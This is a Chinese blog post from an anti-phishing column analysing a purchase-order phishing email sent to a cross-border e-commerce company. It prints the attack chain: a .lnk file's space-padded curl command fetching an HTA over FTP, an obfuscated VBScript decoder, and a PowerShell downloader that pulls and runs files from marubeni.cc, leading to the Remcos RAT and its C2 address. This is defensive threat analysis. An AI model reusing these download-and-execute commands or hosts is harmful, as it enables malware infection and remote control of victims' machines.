针对跨境电商的钓鱼邮件分析

DeepPhish

已于 2025-04-17 17:30:01 修改

阅读量603

点赞数 7

分类专栏：反钓鱼文章标签：反钓鱼安全意识钓鱼邮件 deepphish 溯源报告邮件安全 BEC商业诈骗

于 2025-03-19 18:57:45 首次发布

本文链接：https://blog.youkuaiyun.com/weixin_48006654/article/details/146377945

版权

反钓鱼专栏收录该内容

14 篇文章

订阅专栏

1、邮件分析

近期收到某跨境企业客户举报发现钓鱼邮件，从发件人看上去都很正常。跨境电商绝对是黑阔的重点目标，重点受害群体。

社工话术如下：

下午好,

我们之前和贵公司下过订单，对贵公司的产品质量非常满意。由于这次积极的经历，我们想再下一个订单。随函附上我们希望购买的物品清单。请向我们提供这些产品的价格和运费到以下地址：

Marigalante 427, De Las Americas, Heriberto Kehoe Vicent, 94299 Boca del Rio, Veracruz, Mexico

我们期待您的快速回复，以便尽快完成您的订单。

真诚,

Anahy Zarate Cortes

购买Manager

PIASA小组

上传到deepphish发现，实际发件邮箱为“info@pavsr.ooguy.com”。因为有些邮件客户端只显示发件人display name，不显示具体邮箱，极具迷惑性，亮瞎我得钛金眼。

发件人来源：5.149.253.242

该邮件已经被客户的服务器打上了垃圾邮件标识，被隔离到了客户端垃圾箱中，但依然被员工点击中招，毕竟有个订单不容易🥲。

查看邮箱正文部分诱导用户点击打开附件，附件实际为一个经过混淆加密的恶意程序。

2、样本分析

样本zip解压后为一个lnk文件，运行后会执行一段cmd命令。中间有一长串空格，用以迷惑用户看不到后面的命令参数信息。

C:\Windows\system32\cmd.exe                           /c "curl.exe -s -u 63ddf818-a98c-4ac9-bc69-06cdd215ff96:05613769-3bf7-4da7-9571-fbac4cef4d5d -o %APPDATA%\Acuerdo_de_Orden_de_Compra.hta ftp://45.11.59.49:6152/Acuerdo_de_Orden_de_Compra.hta" & %APPDATA%\A

命令从服器“ftp://45.11.59.49:6152/Acuerdo_de_Orden_de_Compra.hta”下载一个hta文件，该文件为vb代码。代码关键部分已经混淆，文件中字符通过方法进行加密

Function OGVFc(ByVal bVgkqJrMZ)    Dim YiRPUeDqt    Dim ESipMTyUZ    Dim JnYcOWFk    Dim oDTpZDEzL    YiRPUeDqt = VarType(bVgkqJrMZ)    oDTpZDEzL = bVgkqJrMZ(UBound(bVgkqJrMZ))    If YiRPUeDqt = ((2500 * 4) - 1000) + (100 * 5) - 296 - 1000 Then        For Each ESipMTyUZ In bVgkqJrMZ            JnYcOWFk = JnYcOWFk & Chr(ESipMTyUZ - oDTpZDEzL)        Next    Else        JnYcOWFk = Chr(bVgkqJrMZ - oDTpZDEzL)    End If        OGVFc = JnYcOWFkEnd Function

为方便分析使用AI将文本转换成js代码，将密文带入进行分析。

function OGVFc(bVgkqJrMZ) {    // 检查传入的参数是否为数组    const isArray = Array.isArray(bVgkqJrMZ);    // 获取数组的最后一个元素    const oDTpZDEzL = bVgkqJrMZ[bVgkqJrMZ.length - 1];    let JnYcOWFk = '';
    if (isArray) {        // 如果是数组，遍历数组中的每个元素        for (let i = 0; i < bVgkqJrMZ.length; i++) {            const ESipMTyUZ = bVgkqJrMZ[i];            // 将每个元素减去最后一个元素，然后转换为对应的字符并拼接起来            JnYcOWFk += String.fromCharCode(ESipMTyUZ - oDTpZDEzL);        }    } else {        // 如果不是数组，直接将传入的参数减去最后一个元素，然后转换为对应的字符        JnYcOWFk = String.fromCharCode(bVgkqJrMZ - oDTpZDEzL);    }
    return JnYcOWFk;}

通过CreateObject ("Wscript.Shell").Run接口运行powersehll命令：

powershell.exe -ExecutionPolicy UnRestricted function l($hrwDwS, $LskqypWSP){[IO.File]::WriteAllBytes($hrwDwS, $LskqypWSP)};function J($hrwDwS){if($hrwDwS.EndsWith((rbf @(263,317,325,325))) -eq $True){Start-Process (rbf @(331,334,327,317,325,325,268,267,263,318,337,318)) $hrwDwS}else{Start-Process $hrwDwS}};function DPa($yPRsaVwn){$LRHJULvrp = New-Object (rbf @(295,318,333,263,304,318,315,284,325,322,318,327,333));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$LskqypWSP = $LRHJULvrp.DownloadData($yPRsaVwn);return $LskqypWSP};function rbf($wIwvny){$RWgnpEQyG=217;$cBobsYG=$Null;foreach($DuNIrxeq in $wIwvny){$cBobsYG+=[char]($DuNIrxeq-$RWgnpEQyG)};return $cBobsYG};function vXL(){$Fu = $env:APPDATA + '\';$yfp = DPa (rbf @(321,333,333,329,332,275,264,264,326,314,331,334,315,318,327,322,263,316,316,264,282,316,334,318,331,317,328,312,317,318,312,296,331,317,318,327,312,317,318,312,284,328,326,329,331,314,263,329,317,319));$i = $Fu + 'Acuerdo_de_Orden_de_Compra.pdf';l $i $yfp;J $i;;$IAK = DPa (rbf @(321,333,333,329,332,275,264,264,326,314,331,334,315,318,327,322,263,316,316,264,326,329,316,325,322,318,327,333,263,317,325,325));$sx = $Fu + 'mpclient.dll';l $sx $IAK;J $sx;;$kUN = DPa (rbf @(321,333,333,329,332,275,264,264,326,314,331,334,315,318,327,322,263,316,316,264,282,316,334,318,331,317,328,312,317,318,312,296,331,317,318,327,312,317,318,312,284,328,326,329,331,314,263,318,337,318));$tM = $Fu + 'Acuerdo_de_Orden_de_Compra.exe';l $tM $kUN;J $tM;;}vXL;

该脚本会下载3个文件写入%APPDATA%目录，并打开运行。针对dll文件使用rundll32.exe进行加载

https://marubeni.cc/Acuerdo_de_Orden_de_Compra.pdfhttps://marubeni.cc/mpclient.dllhttps://marubeni.cc/Acuerdo_de_Orden_de_Compra.exe

其中“https://marubeni.cc/mpclient.dll”，为恶意文件。通过沙箱分析，确定该样本为商用木马Remcos，运行后连接远程地址“104.245.145.253:60142”。

Remcos 木马是一种远程访问木马（RAT），于 2016 年首次现身。传播途径：钓鱼邮件附件：常利用欺骗性钓鱼邮件附件，如 OLE Excel 格式的订单通知文档等，诱骗用户打开文件。恶意下载程序：通过恶意 Microsoft 文档或下载程序进行传播，还曾在涉及 Fruity 恶意软件下载程序的攻击活动中被发现，诱使受害者下载 Fruity 下载程序来最终安装 Remcos。利用漏洞：攻击者会利用软件漏洞传播该木马。如利用 CVE - 2017 - 0199 漏洞，通过包含恶意 Excel 文件的网络钓鱼邮件，文件中的 OLE 对象嵌有恶意 URL，打开后下载执行恶意 HTA 文件，最终将 Remcos 远控木马注入正常 Windows 进程。技术特点：多层混淆：采用多层混淆技术来逃避检测，使安全软件难以识别。进程空洞化：将合法进程内存清空，再注入恶意代码，伪装成合法程序隐蔽运行。反调试技术：具备反调试特性，增加分析和检测难度。添加自启动项：通过修改注册表添加自启动项，实现长期驻留于已感染系统中。

下附木马能力，可以想象，下一步就是长期监控，各种商业诈骗套路了。